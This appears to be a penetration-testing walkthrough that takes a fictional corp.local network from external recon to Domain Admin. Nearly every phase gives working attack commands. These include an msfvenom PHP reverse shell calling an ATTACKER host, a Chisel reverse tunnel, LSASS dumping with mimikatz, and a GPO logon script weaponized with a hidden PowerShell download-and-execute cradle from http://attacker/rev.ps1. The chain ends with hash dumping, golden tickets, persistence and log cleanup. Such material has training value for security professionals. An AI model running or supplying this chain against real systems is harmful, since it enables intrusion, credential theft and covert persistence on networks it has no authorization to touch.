Pentesting Scenario: External to Domain Admin
Objective:
Start with external recon, gain a foothold on a DMZ web server, escalate privileges, pivot into the internal LAN, move laterally, enumerate Active Directory, and become Domain Admin — all while remaining stealthy and methodical.
Pentest Flow: External to Domain Admin
──────────────────────────────────────
[1] External Recon
├─ Subdomain & Service Discovery
└─ Identify Exposed CMS
↓
[2] Initial Access
├─ Exploit CMS Vulnerability (RCE)
└─ Upload Reverse Shell
↓
[3] Privilege Escalation (Local)
├─ System Enumeration
└─ Exploit SeImpersonatePrivilege → SYSTEM
↓
[4] Internal Recon & Pivoting
├─ Discover Internal Subnets & Domain
└─ Tunnel via Chisel/Proxychains
↓
[5] AD Enumeration
├─ List Shares, Users, SPNs
└─ Extract Creds from SYSVOL or Shares
↓
[6] Lateral Movement
├─ WinRM / PSExec to Reach Other Hosts
└─ Dump LSASS → Harvest Higher Priv Creds
↓
[7] Privilege Escalation (Domain)
├─ Abuse GPO / Delegation / Misconfigs
└─ Trigger Execution on Domain Controller
↓
[8] Post-Exploitation
├─ Dump Hashes / Tickets
├─ Golden Ticket / Persistence
└─ Full Domain Dominance
Phase 1: External Reconnaissance
Goal: Identify a vulnerable public-facing asset to gain initial access.
Passive Recon:
- Google Dorking, crt.sh, LinkedIn, Hunter.io
- Tools:
theHarvester,subfinder,amass - Discover subdomains like
vpn.corp.local,dev.corp.local,staging.corp.local - Scrape employee names for social engineering later.
Active Recon:
- Full port scan on discovered hosts:
nmap -sS -p- --min-rate 1000 -T4 corp.com - Version detection on top ports:
nmap -sV -sC -Pn -p 21,22,80,443,445,3389 corp.com - Identify an outdated CMS on
dev.corp.comrunning Apache/PHP.
Phase 2: Initial Access via Web Exploitation
Exploit:
- CMS Plugin RCE using Metasploit:
use exploit/multi/http/joomla_plugin_upload - Manual path: Upload a PHP reverse shell via LFI/RFI or misconfigured upload handler.
Payload:
msfvenom -p php/meterpreter_reverse_tcp LHOST=ATTACKER LPORT=4444 -f raw > shell.php
Access:
- Catch shell with:
nc -lvnp 4444
Result: You now have a low-priv web shell on a DMZ server.
Phase 3: Privilege Escalation (Local Host)
Enumeration:
whoami
hostname
systeminfo
net user
wmic qfe
- The server is unpatched (e.g., MS16-098 vulnerable).
- Local user has
SeImpersonatePrivilege.
Exploit:
Use JuicyPotato or PrintSpoofer (depending on OS):
PrintSpoofer64.exe -i -c cmd.exe
Now you’re NT AUTHORITY\SYSTEM.
Phase 4: Internal Reconnaissance & Pivoting
Map the Network:
ipconfig /all
route print
arp -a
netstat -ano
- Discover internal subnet
10.0.10.0/24 - Confirm connection to
corp.localdomain
Pivot:
Set up tunneling:
- Chisel reverse proxy:
chisel server -p 8000 --reverse ./chisel client attacker:8000 R:1080:socks - Use proxychains to tunnel internal tools:
proxychains nmap -sT -Pn -p445,3389 10.0.10.0/24 - Discover file server and DC:
dc01.corp.local
Phase 5: Internal Enumeration & Credential Hunting
Tools:
CrackMapExec, smbclient, enum4linux-ng, ldapsearch
Run:
cme smb 10.0.10.5 -u '' -p '' --shares
Finds:
- GPO scripts with hardcoded creds in
\\corp.local\SYSVOL\corp.local\scripts\deploy.bat - Password:
ithelpdesk:P@ssword123
Authenticate with:
evil-winrm -i 10.0.10.5 -u ithelpdesk -p 'P@ssword123'
Result: You’re now ithelpdesk, a domain user.
Phase 6: Lateral Movement
Step-by-step:
- Use BloodHound or
SharpHound.ps1via WinRM - Analyze path:
ithelpdesk→srv-helpdesk→svcadmin→ DC
Pivot Again:
- From ithelpdesk to
srv-helpdeskvia PSExec or WinRM - Dump LSASS:
procdump -ma lsass.exe lsass.dmp - Extract credentials:
mimikatz sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords
Phase 7: Escalating to Domain Admin
Target:
svcadmin is a member of the GPO Editor group.
- GPO is linked to Domain Controllers OU
- GPO contains a
logon.batscript
Weaponize:
Edit the script to include:
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker/rev.ps1')"
Force GPO refresh or wait for logon.
Result:
SYSTEM shell on the Domain Controller:
nc -lvnp 5555
whoami
Phase 8: Post-Exploitation
Actions:
- Dump AD hashes:
secretsdump.py corp.local/svcadmin:P@ssword123@dc01.corp.local - Create golden ticket:
kerberos::ptt ticket.kirbi - Persistence: DS backdoor, skeleton key, malicious GPO
- Clean up: logs, scripts, artifacts
Final Mindmap:
External Recon
└── Find CMS
└── Web Exploit → Web Shell
└── Priv Esc → SYSTEM
└── Internal Recon
└── Pivoting (Chisel)
└── SMB/AD Enum
└── Creds in SYSVOL
└── Lateral Movement (WinRM)
└── Credential Dump
└── GPO Misconfig
└── Domain Admin
└── Post Exploitation
Tool Cheatsheet by Phase
| Phase | Tools |
|---|---|
| Recon (External) | Nmap, Subfinder, Shodan |
| Initial Access | Metasploit, FFUF, Burp |
| Privilege Escalation | WinPEAS, PrintSpoofer |
| Internal Recon | ipconfig, netstat, route |
| Pivoting | Chisel, reGeorg, proxychains |
| AD Enumeration | BloodHound, CME, ldapsearch |
| Lateral Movement | Evil-WinRM, PSExec |
| Exploiting AD | Mimikatz, GPO Abuse |
| Post-Exploitation | secretsdump, golden ticket, DSAdd |